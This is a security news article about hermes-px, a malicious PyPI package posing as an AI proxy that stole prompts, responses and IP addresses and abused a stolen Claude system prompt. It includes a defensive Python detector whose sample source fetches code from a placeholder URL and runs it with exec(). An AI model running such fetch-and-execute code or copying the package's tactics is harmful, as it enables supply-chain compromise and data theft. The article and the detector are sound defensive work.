A sophisticated supply chain attack has been uncovered in the Python ecosystem, where a malicious package named hermes-px was used to secretly steal sensitive data from developers. Discovered by JFrog, the package was distributed via PyPI and disguised as a secure AI proxy tool, making it particularly dangerous for developers working with AI applications.

At first glance, hermes-px appeared legitimate. It promised anonymous AI inference by routing requests through Tor and mimicked the interface of popular AI SDKs. With polished documentation, working examples, and even advanced features like retrieval-augmented generation (RAG), the package was carefully designed to build trust. It even presented itself as a product from a fake company, creating the illusion of a credible solution for developers seeking free AI access without API keys.

However, beneath this convincing façade, the package was actively exploiting users. It secretly hijacked a private university’s AI endpoint and embedded a stolen system prompt from Anthropic’s Claude model. While the attackers attempted to rebrand the prompt, traces of its original source remained, confirming its origin. This misuse of proprietary AI infrastructure added another layer of ethical and security concerns.

The most alarming aspect of the attack was its data exfiltration mechanism. Every prompt sent by users, along with the AI-generated responses, was quietly captured and transmitted to an attacker-controlled database. Despite claiming to route traffic through Tor for anonymity, the package bypassed this layer for telemetry, exposing users' real IP addresses. This contradiction made the tool not only deceptive but also highly invasive.

To further evade detection, the attackers used multi-layered encryption techniques to hide critical strings such as database credentials and endpoints. Additionally, the package instructed users to execute remote Python code from an external source, allowing attackers to update their payload dynamically. This ensured the malware could evolve even after initial deployment.
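As an added example (not code from the article, JFrog, or the package itself), here is a small static check a team could run over a dependency's source before trusting it. It flags the two behaviours just described: decoder calls nested inside other decoder calls (layered string hiding) and exec()/eval() of data that came from a network fetch. The sample source and its URL and encoded value are constructed placeholders, not taken from hermes-px.

```python
import ast
from typing import List, Set

# Constructed sample of package source showing the two behaviours described above:
# layered decoding of a hidden string and exec() of Python fetched from a remote URL.
# The URL and encoded value are made-up placeholders, not taken from hermes-px.
SAMPLE_SOURCE = '''
import base64, urllib.request
_k = base64.b64decode(base64.b64decode(b"YUdWc2JHOD0="))
code = urllib.request.urlopen("https://example.invalid/update.py").read()
exec(code)
'''

NET_FETCH = {"urlopen", "get", "post"}  # heuristic: dict.get() also matches
EXEC_LIKE = {"exec", "eval"}
DECODERS = {"b64decode", "b32decode", "b16decode", "unhexlify", "decompress"}


def _call_name(node: ast.Call) -> str:
    """Bare function or method name of a call, e.g. 'b64decode' or 'exec'."""
    f = node.func
    return f.id if isinstance(f, ast.Name) else f.attr if isinstance(f, ast.Attribute) else ""


def _calls_in(node: ast.AST) -> Set[str]:
    """Names of every call nested anywhere under the given node."""
    return {_call_name(c) for c in ast.walk(node) if isinstance(c, ast.Call)}


def find_indicators(source: str) -> List[str]:
    tree = ast.parse(source)
    # Pass 1: variable names whose assigned value involves a network fetch.
    fetched = {t.id for n in ast.walk(tree) if isinstance(n, ast.Assign) and _calls_in(n.value) & NET_FETCH
               for t in n.targets if isinstance(t, ast.Name)}
    findings = []
    # Pass 2: exec/eval fed by fetched data, and decoder calls wrapped in decoder calls.
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in EXEC_LIKE:
            for arg in node.args:
                if (isinstance(arg, ast.Name) and arg.id in fetched) or _calls_in(arg) & NET_FETCH:
                    findings.append(f"line {node.lineno}: {name}() of remotely fetched code")
        elif name in DECODERS:
            inner = [_call_name(a) for a in node.args if isinstance(a, ast.Call) and _call_name(a) in DECODERS]
            if inner:
                findings.append(f"line {node.lineno}: layered decoding ({inner[0]} inside {name})")
    return findings


if __name__ == "__main__":
    for finding in find_indicators(SAMPLE_SOURCE):
        print(finding)
```

The check is a heuristic for triage, not proof of malice; a hit means a human should read that code path before the package is installed anywhere.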

This incident highlights a growing trend in software supply chain attacks, where threat actors invest significant effort into making malicious packages appear trustworthy. By targeting developers—who often integrate such tools directly into production environments—attackers can gain access to valuable data and systems at scale.

Security experts strongly advise anyone who installed the package to remove it immediately, rotate all credentials, and treat any exposed data as compromised. More broadly, this case serves as a reminder that even well-documented and seemingly professional tools can hide serious threats, reinforcing the need for strict dependency vetting and runtime monitoring.
